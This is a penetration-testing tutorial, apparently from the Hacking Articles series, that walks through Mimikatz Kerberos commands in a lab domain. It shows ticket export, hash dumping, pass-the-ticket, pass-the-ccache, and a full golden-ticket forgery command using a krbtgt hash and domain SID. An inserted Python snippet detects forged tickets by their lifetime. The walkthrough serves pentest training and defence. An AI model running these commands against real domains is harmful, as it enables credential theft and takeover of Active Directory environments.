Monday, July 11, 2022

MimiKatz for Pentester: Kerberos – Hacking Articles


This write-up is part of a series of articles on the tool Mimikatz, which is written in the C programming language. It is mainly used for extracting Kerberos tickets from memory and for generating golden tickets.

Table of Contents

  • Kerberos::list
  • Kerberos::list /export
  • Kerberos::ptt ticket.kirbi
  • Kerberos::tgt
  • Kerberos::ask
  • Kerberos::hash
  • Kerberos::golden
  • Kerberos::ptc
  • Kerberos::clist
  • Kerberos::purge

In this scenario, we will be using Mimikatz inside the client machine to find out which tickets are available on the client system.

Kerberos::list

We will use the command:

kerberos::list

This list command will display all the tickets available on the client machine.

As you can see from the above screenshot, there are 2 tickets in our client machine. The list command shows information such as:

  1. Start/End time of the ticket
  2. Server name
  3. Client name
  4. Flags

Kerberos::list /export

Now that this information is available, if we want to save these tickets for future use or reference, we use the following command:

kerberos::list /export

This will save the above TGT tickets in the Mimikatz folder in the kirbi format.

Now that the ticket has been saved in the Mimikatz folder, we renamed it to ticket.kirbi for ease of use. Note that this is not a mandatory step.

Since we now have this ticket, we will see how it can be used later for lateral movement so that we can perform a pass-the-ticket attack.

To perform pass the ticket (ptt), we issue the following command:

kerberos::ptt ticket.kirbi

Once the command has executed successfully, we issue another command, misc::cmd, which opens a command prompt session. We can see that the command prompt session has been opened as the domain user ignite\aarti.

Let's try to browse the directory listing of the server as the user aarti by typing the following command in the command prompt:

dir \\192.168.1.188\c$ (192.168.1.188 is the server IP address)

As you can see, we are able to view all the directories of the server.

So, using a non-administrator domain account, the user aarti was able to read the directory listing of the C drive of the server by means of a PTT attack.

Kerberos TGT

To display all TGTs (Ticket Granting Tickets), we can use the following command:

kerberos::tgt

Kerberos ASK

It allows you to request a service ticket. The syntax for running this command is as follows:

kerberos::ask /target:<SPN>, where the SPN here is cifs/dc1.ignite.local

kerberos::ask /target:cifs/dc1.ignite.local

To display all the service tickets, we issue the command:

kerberos::list

As we can see, we now have 3 tickets listed below.

Kerberos Hash

kerberos::hash

This will dump all hashes available on the client machine.

Kerberos::golden

Golden Ticket Attack (GTA)

Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. The basic information needed to perform this attack is:

  1. Domain name: ignite.local
  2. SID: S-1-5-21-1255168540-3690278322-1592948969
  3. KRBTGT Hash: 5cced0cb593612f08cf4a0b4f0bcb017
  4. And a user to impersonate: raaz

So if we have the domain name, the SID and the hash value of krbtgt, then we can go for a pass-the-ticket attack by generating a forged golden ticket.

So the command for performing GTA is as follows:

kerberos::golden /user:raaz /domain:ignite.local /sid:S-1-5-21-1255168540-3690278322-1592948969 /krbtgt:5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt

Where id:500 is for administrator privilege (500 is the RID of the built-in Administrator account).

As shown above, the command completed successfully. Now let's launch the command prompt via Mimikatz by issuing the command: misc::cmd

Through the new command prompt, we can access the server directories the same as in the earlier examples.

Another method of golden ticket attack can be performed by using the tool impacket.

When using Mimikatz or Rubeus, they generate the ticket as a .kirbi file. But if we use impacket for the golden ticket attack, it will not give us the ticket in kirbi format; it gives the ticket in .ccache format.
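The fields that kerberos::list prints (start/end time, server name, client name, flags) are also what a defender inspects to spot a forged TGT: a ticket issued by the KDC is bounded by the domain policy (10 hours by default), whereas a Mimikatz golden ticket defaults to a ten-year validity window. The following Python example is added here and is not from the original article; it parses constructed output in the layout of kerberos::list and flags tickets whose lifetime exceeds the policy maximum. The sample output and the 10-hour limit are assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumption: default domain policy, maximum TGT lifetime of 10 hours.
MAX_TICKET_LIFETIME = timedelta(hours=10)

# Constructed sample in the layout of mimikatz kerberos::list output: one KDC-issued
# TGT (10-hour window) and one with the ten-year window a forged ticket gets by default.
SAMPLE_LIST_OUTPUT = """\
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 7/11/2022 10:05:34 AM ; 7/11/2022 8:05:34 PM ; 7/18/2022 10:05:34 AM
   Server Name       : krbtgt/IGNITE.LOCAL @ IGNITE.LOCAL
   Client Name       : aarti @ IGNITE.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 7/11/2022 10:20:01 AM ; 7/9/2032 10:20:01 AM ; 7/9/2032 10:20:01 AM
   Server Name       : krbtgt/ignite.local @ ignite.local
   Client Name       : raaz @ ignite.local
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
"""

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"
TICKET_RE = re.compile(
    r"\[[0-9a-f]{8}\][^\n]*\n"
    r"\s*Start/End/MaxRenew:\s*(?P<start>[^;]+);\s*(?P<end>[^;]+);[^\n]*\n"
    r"\s*Server Name\s*:\s*(?P<server>[^\n]+)\n"
    r"\s*Client Name\s*:\s*(?P<client>[^\n]+)\n"
    r"\s*Flags\s+[0-9a-f]{8}\s*:\s*(?P<flags>[^\n]*)",
    re.IGNORECASE,
)

def parse_tickets(text):
    """Return one dict per ticket block found in kerberos::list style output."""
    tickets = []
    for m in TICKET_RE.finditer(text):
        start = datetime.strptime(m["start"].strip(), TIME_FMT)
        end = datetime.strptime(m["end"].strip(), TIME_FMT)
        tickets.append({
            "server": m["server"].strip(),
            "client": m["client"].strip(),
            "lifetime": end - start,
            "flags": [f.strip() for f in m["flags"].split(";") if f.strip()],
        })
    return tickets

def suspicious_tickets(text, max_lifetime=MAX_TICKET_LIFETIME):
    """Tickets whose validity window exceeds the policy maximum: a forged ticket is
    minted by the attacker, so nothing forces it to respect the KDC's policy."""
    return [t for t in parse_tickets(text) if t["lifetime"] > max_lifetime]
```

On a real host the same check can be run over the output of kerberos::list or klist, and a ticket with a multi-year window for krbtgt is worth an immediate investigation.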

Kerberos::ptc

So if we have the ticket in ccache format, then we can perform pass the ccache as shown below. The command is:

kerberos::ptc Administrator.ccache

misc::cmd will open a new command prompt in which we can access the server directories, the same as in our earlier examples.

Kerberos::clist

If we want to list all the ccache files that exist on the client system, we use the following command:

kerberos::clist Administrator.ccache

Kerberos::purge

If we want to delete all the tickets, in either ccache or kirbi format, we can use the following command:

kerberos::purge

Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be contacted on LinkedIn
